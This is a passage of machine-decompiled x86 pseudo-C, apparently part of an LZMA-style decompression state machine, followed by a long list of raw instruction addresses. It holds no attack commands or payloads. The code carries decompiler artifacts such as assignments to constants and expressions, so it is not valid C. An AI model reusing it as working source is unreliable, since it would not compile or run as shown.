                                                                                                                          						case 7:
                                                                                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          							if( *(__ebp - 0x40) != 1) {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          								 *(__ebp - 0x80) = 0x16;
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x28);
                                                                                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          								__eax = 0;
                                                                                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          								__al = __al & 0x000000fd;
                                                                                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *(__ebp - 0x58) = __eax;
                                                                                                                          								goto L68;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 4);
                                                                                                                          							__ecx =  *(__ebp - 0x38);
                                                                                                                          							 *(__ebp - 0x84) = 8;
                                                                                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 8:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xa;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x38);
                                                                                                                          								__ecx =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          								 *(__ebp - 0x84) = 9;
                                                                                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          							}
                                                                                                                          							goto L132;
                                                                                                                          						case 9:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								goto L89;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x60);
                                                                                                                          							if( *(__ebp - 0x60) == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							}
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          							__eflags = _t258;
                                                                                                                          							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          							goto L75;
                                                                                                                          						case 0xa:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xb;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x28);
                                                                                                                          							goto L88;
                                                                                                                          						case 0xb:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x20);
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x28);
                                                                                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          							L88:
                                                                                                                          							__ecx =  *(__ebp - 0x2c);
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          							L89:
                                                                                                                          							__eax =  *(__ebp - 4);
                                                                                                                          							 *(__ebp - 0x80) = 0x15;
                                                                                                                          							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          							goto L68;
                                                                                                                          						case 0xc:
                                                                                                                          							L99:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xc;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t334 = __ebp - 0x70;
                                                                                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t334;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							__eax =  *(__ebp - 0x2c);
                                                                                                                          							goto L101;
                                                                                                                          						case 0xd:
                                                                                                                          							goto L36;
                                                                                                                          						case 0xe:
                                                                                                                          							goto L45;
                                                                                                                          						case 0xf:
                                                                                                                          							goto L57;
                                                                                                                          						case 0x10:
                                                                                                                          							L109:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x10;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t365 = __ebp - 0x70;
                                                                                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t365;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							goto L111;
                                                                                                                          						case 0x11:
                                                                                                                          							L68:
                                                                                                                          							__esi =  *(__ebp - 0x58);
                                                                                                                          							 *(__ebp - 0x84) = 0x12;
                                                                                                                          							goto L132;
                                                                                                                          						case 0x12:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 0x58);
                                                                                                                          								 *(__ebp - 0x84) = 0x13;
                                                                                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x4c);
                                                                                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          							__eflags = __eax;
                                                                                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          							goto L130;
                                                                                                                          						case 0x13:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								_t469 = __ebp - 0x58;
                                                                                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          								__eflags =  *_t469;
                                                                                                                          								 *(__ebp - 0x30) = 0x10;
                                                                                                                          								 *(__ebp - 0x40) = 8;
                                                                                                                          								L144:
                                                                                                                          								 *(__ebp - 0x7c) = 0x14;
                                                                                                                          								goto L145;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x4c);
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          							 *(__ebp - 0x30) = 8;
                                                                                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          							L130:
                                                                                                                          							 *(__ebp - 0x58) = __eax;
                                                                                                                          							 *(__ebp - 0x40) = 3;
                                                                                                                          							goto L144;
                                                                                                                          						case 0x14:
                                                                                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          							__eax =  *(__ebp - 0x80);
                                                                                                                          							goto L140;
                                                                                                                          						case 0x15:
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          							__al = __al & 0x000000fd;
                                                                                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							goto L120;
                                                                                                                          						case 0x16:
                                                                                                                          							__eax =  *(__ebp - 0x30);
                                                                                                                          							__eflags = __eax - 4;
                                                                                                                          							if(__eax >= 4) {
                                                                                                                          								_push(3);
                                                                                                                          								_pop(__eax);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 4);
                                                                                                                          							 *(__ebp - 0x40) = 6;
                                                                                                                          							__eax = __eax << 7;
                                                                                                                          							 *(__ebp - 0x7c) = 0x19;
                                                                                                                          							 *(__ebp - 0x58) = __eax;
                                                                                                                          							goto L145;
                                                                                                                          						case 0x17:
                                                                                                                          							L145:
                                                                                                                          							__eax =  *(__ebp - 0x40);
                                                                                                                          							 *(__ebp - 0x50) = 1;
                                                                                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          							goto L149;
                                                                                                                          						case 0x18:
                                                                                                                          							L146:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x18;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t484 = __ebp - 0x70;
                                                                                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t484;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L148:
                                                                                                                          							_t487 = __ebp - 0x48;
                                                                                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          							__eflags =  *_t487;
                                                                                                                          							L149:
                                                                                                                          							__eflags =  *(__ebp - 0x48);
                                                                                                                          							if( *(__ebp - 0x48) <= 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x40);
                                                                                                                          								__ebx =  *(__ebp - 0x50);
                                                                                                                          								0 = 1;
                                                                                                                          								__eax = 1 << __cl;
                                                                                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          								__eax =  *(__ebp - 0x7c);
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								goto L140;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x50);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eax = __eax - __ecx;
                                                                                                                          								__edx = __edx + 1;
                                                                                                                          								__eflags = __edx;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          								 *(__ebp - 0x50) = __edx;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L148;
                                                                                                                          							} else {
                                                                                                                          								goto L146;
                                                                                                                          							}
                                                                                                                          						case 0x19:
                                                                                                                          							__eflags = __ebx - 4;
                                                                                                                          							if(__ebx < 4) {
                                                                                                                          								 *(__ebp - 0x2c) = __ebx;
                                                                                                                          								L119:
                                                                                                                          								_t393 = __ebp - 0x2c;
                                                                                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          								__eflags =  *_t393;
                                                                                                                          								L120:
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax;
                                                                                                                          								if(__eax == 0) {
                                                                                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          									goto L170;
                                                                                                                          								}
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          									goto L171;
                                                                                                                          								}
                                                                                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          								__eax =  *(__ebp - 0x30);
                                                                                                                          								_t400 = __ebp - 0x60;
                                                                                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          								__eflags =  *_t400;
                                                                                                                          								goto L123;
                                                                                                                          							}
                                                                                                                          							__ecx = __ebx;
                                                                                                                          							__eax = __ebx;
                                                                                                                          							__ecx = __ebx >> 1;
                                                                                                                          							__eax = __ebx & 0x00000001;
                                                                                                                          							__ecx = (__ebx >> 1) - 1;
                                                                                                                          							__al = __al | 0x00000002;
                                                                                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          							__eflags = __ebx - 0xe;
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							if(__ebx >= 0xe) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								 *(__ebp - 0x48) = __ecx;
                                                                                                                          								L102:
                                                                                                                          								__eflags =  *(__ebp - 0x48);
                                                                                                                          								if( *(__ebp - 0x48) <= 0) {
                                                                                                                          									__eax = __eax + __ebx;
                                                                                                                          									 *(__ebp - 0x40) = 4;
                                                                                                                          									 *(__ebp - 0x2c) = __eax;
                                                                                                                          									__eax =  *(__ebp - 4);
                                                                                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									L108:
                                                                                                                          									__ebx = 0;
                                                                                                                          									 *(__ebp - 0x58) = __eax;
                                                                                                                          									 *(__ebp - 0x50) = 1;
                                                                                                                          									 *(__ebp - 0x44) = 0;
                                                                                                                          									 *(__ebp - 0x48) = 0;
                                                                                                                          									L112:
                                                                                                                          									__eax =  *(__ebp - 0x40);
                                                                                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          										_t391 = __ebp - 0x2c;
                                                                                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          										__eflags =  *_t391;
                                                                                                                          										goto L119;
                                                                                                                          									}
                                                                                                                          									__eax =  *(__ebp - 0x50);
                                                                                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          									__eax =  *(__ebp - 0x58);
                                                                                                                          									__esi = __edi + __eax;
                                                                                                                          									 *(__ebp - 0x54) = __esi;
                                                                                                                          									__ax =  *__esi;
                                                                                                                          									__ecx = __ax & 0x0000ffff;
                                                                                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          										__ecx = 0;
                                                                                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          										__ecx = 1;
                                                                                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          										__ebx = 1;
                                                                                                                          										__ecx =  *(__ebp - 0x48);
                                                                                                                          										__ebx = 1 << __cl;
                                                                                                                          										__ecx = 1 << __cl;
                                                                                                                          										__ebx =  *(__ebp - 0x44);
                                                                                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          										__cx = __ax;
                                                                                                                          										__cx = __ax >> 5;
                                                                                                                          										__eax = __eax - __ecx;
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										__eflags = __edi;
                                                                                                                          										 *(__ebp - 0x44) = __ebx;
                                                                                                                          										 *__esi = __ax;
                                                                                                                          										 *(__ebp - 0x50) = __edi;
                                                                                                                          									} else {
                                                                                                                          										 *(__ebp - 0x10) = __edx;
                                                                                                                          										0x800 = 0x800 - __ecx;
                                                                                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          										 *__esi = __dx;
                                                                                                                          									}
                                                                                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          										L111:
                                                                                                                          										_t368 = __ebp - 0x48;
                                                                                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          										__eflags =  *_t368;
                                                                                                                          										goto L112;
                                                                                                                          									} else {
                                                                                                                          										goto L109;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0xc);
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          									__ecx =  *(__ebp - 0x10);
                                                                                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          									__ebx = __ebx | 0x00000001;
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									 *(__ebp - 0x44) = __ebx;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          									L101:
                                                                                                                          									_t338 = __ebp - 0x48;
                                                                                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          									__eflags =  *_t338;
                                                                                                                          									goto L102;
                                                                                                                          								} else {
                                                                                                                          									goto L99;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__edx =  *(__ebp - 4);
                                                                                                                          							__eax = __eax - __ebx;
                                                                                                                          							 *(__ebp - 0x40) = __ecx;
                                                                                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          							goto L108;
                                                                                                                          						case 0x1a:
                                                                                                                          							goto L55;
                                                                                                                          						case 0x1b:
                                                                                                                          							L75:
                                                                                                                          							__eflags =  *(__ebp - 0x64);
                                                                                                                          							if( *(__ebp - 0x64) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x1b;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x14);
                                                                                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          							__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          								__eflags = __eax;
                                                                                                                          							}
                                                                                                                          							__edx =  *(__ebp - 8);
                                                                                                                          							__cl =  *(__eax + __edx);
                                                                                                                          							__eax =  *(__ebp - 0x14);
                                                                                                                          							 *(__ebp - 0x5c) = __cl;
                                                                                                                          							 *(__eax + __edx) = __cl;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          							__edx = _t274;
                                                                                                                          							__eax =  *(__ebp - 0x68);
                                                                                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          							_t283 = __ebp - 0x64;
                                                                                                                          							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                          							__eflags =  *_t283;
                                                                                                                          							 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          							goto L79;
                                                                                                                          						case 0x1c:
                                                                                                                          							while(1) {
                                                                                                                          								L123:
                                                                                                                          								__eflags =  *(__ebp - 0x64);
                                                                                                                          								if( *(__ebp - 0x64) == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__edx =  *(__ebp - 8);
                                                                                                                          								__cl =  *(__eax + __edx);
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								 *(__ebp - 0x5c) = __cl;
                                                                                                                          								 *(__eax + __edx) = __cl;
                                                                                                                          								__eax = __eax + 1;
                                                                                                                          								__edx = 0;
                                                                                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          								__edx = _t414;
                                                                                                                          								__eax =  *(__ebp - 0x68);
                                                                                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          								__eflags =  *(__ebp - 0x30);
                                                                                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          								 *(__ebp - 0x14) = __edx;
                                                                                                                          								if( *(__ebp - 0x30) > 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L80;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x88) = 0x1c;
                                                                                                                          							goto L170;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          0x00000000
                                                                                                                          0x00406d5f
                                                                                                                          0x00406d5f
                                                                                                                          0x00406d64
                                                                                                                          0x00406ddb
                                                                                                                          0x00406de2
                                                                                                                          0x00406dec
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x004073ce
                                                                                                                          0x004073ce
                                                                                                                          0x004073d4
                                                                                                                          0x004073da
                                                                                                                          0x004073e0
                                                                                                                          0x004073fa
                                                                                                                          0x004073fd
                                                                                                                          0x00407403
                                                                                                                          0x0040740e
                                                                                                                          0x00407410
                                                                                                                          0x004073e2
                                                                                                                          0x004073e2
                                                                                                                          0x004073f1
                                                                                                                          0x004073f5
                                                                                                                          0x004073f5
                                                                                                                          0x0040741a
                                                                                                                          0x00407441
                                                                                                                          0x00407441
                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x0040741c
                                                                                                                          0x0040741c
                                                                                                                          0x00407420
                                                                                                                          0x004075cf
                                                                                                                          0x00000000
                                                                                                                          0x004075cf
                                                                                                                          0x0040742c
                                                                                                                          0x00407433
                                                                                                                          0x0040743b
                                                                                                                          0x0040743e
                                                                                                                          0x00000000
                                                                                                                          0x0040743e
                                                                                                                          0x00406d66
                                                                                                                          0x00406d66
                                                                                                                          0x00406d6a
                                                                                                                          0x00406d72
                                                                                                                          0x00406d75
                                                                                                                          0x00406d77
                                                                                                                          0x00406d7a
                                                                                                                          0x00406d7c
                                                                                                                          0x00406d81
                                                                                                                          0x00406d84
                                                                                                                          0x00406d8b
                                                                                                                          0x00406d92
                                                                                                                          0x00406d95
                                                                                                                          0x00406da0
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406daf
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dcf
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa5
                                                                                                                          0x00406fa8
                                                                                                                          0x00406fab
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb1
                                                                                                                          0x00406fb4
                                                                                                                          0x00406fb7
                                                                                                                          0x00406fba
                                                                                                                          0x00406fc0
                                                                                                                          0x00406fd8
                                                                                                                          0x00406fdb
                                                                                                                          0x00406fde
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe4
                                                                                                                          0x00406fea
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fca
                                                                                                                          0x00406fcf
                                                                                                                          0x00406fd1
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fd3
                                                                                                                          0x00406ff4
                                                                                                                          0x00406ff7
                                                                                                                          0x00406f9a
                                                                                                                          0x00406fa0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00406f75
                                                                                                                          0x00406f79
                                                                                                                          0x00407581
                                                                                                                          0x00000000
                                                                                                                          0x00407581
                                                                                                                          0x00406f7f
                                                                                                                          0x00406f82
                                                                                                                          0x00406f85
                                                                                                                          0x00406f89
                                                                                                                          0x00406f8c
                                                                                                                          0x00406f92
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f97
                                                                                                                          0x00000000
                                                                                                                          0x00406f97
                                                                                                                          0x00406db1
                                                                                                                          0x00406db1
                                                                                                                          0x00406db4
                                                                                                                          0x00406dba
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbf
                                                                                                                          0x00406dc2
                                                                                                                          0x00406dc4
                                                                                                                          0x00406dc5
                                                                                                                          0x00406dc8
                                                                                                                          0x00406e35
                                                                                                                          0x00406e35
                                                                                                                          0x00406e39
                                                                                                                          0x00406e3c
                                                                                                                          0x00406e3f
                                                                                                                          0x00406e42
                                                                                                                          0x00406e45
                                                                                                                          0x00406e46
                                                                                                                          0x00406e49
                                                                                                                          0x00406e4b
                                                                                                                          0x00406e51
                                                                                                                          0x00406e54
                                                                                                                          0x00406e57
                                                                                                                          0x00406e5a
                                                                                                                          0x00406e5d
                                                                                                                          0x00406e63
                                                                                                                          0x00406e7f
                                                                                                                          0x00406e82
                                                                                                                          0x00406e85
                                                                                                                          0x00406e88
                                                                                                                          0x00406e8f
                                                                                                                          0x00406e95
                                                                                                                          0x00406e99
                                                                                                                          0x00406e65
                                                                                                                          0x00406e65
                                                                                                                          0x00406e69
                                                                                                                          0x00406e71
                                                                                                                          0x00406e76
                                                                                                                          0x00406e78
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e7a
                                                                                                                          0x00406ea3
                                                                                                                          0x00406ea6
                                                                                                                          0x00406e1d
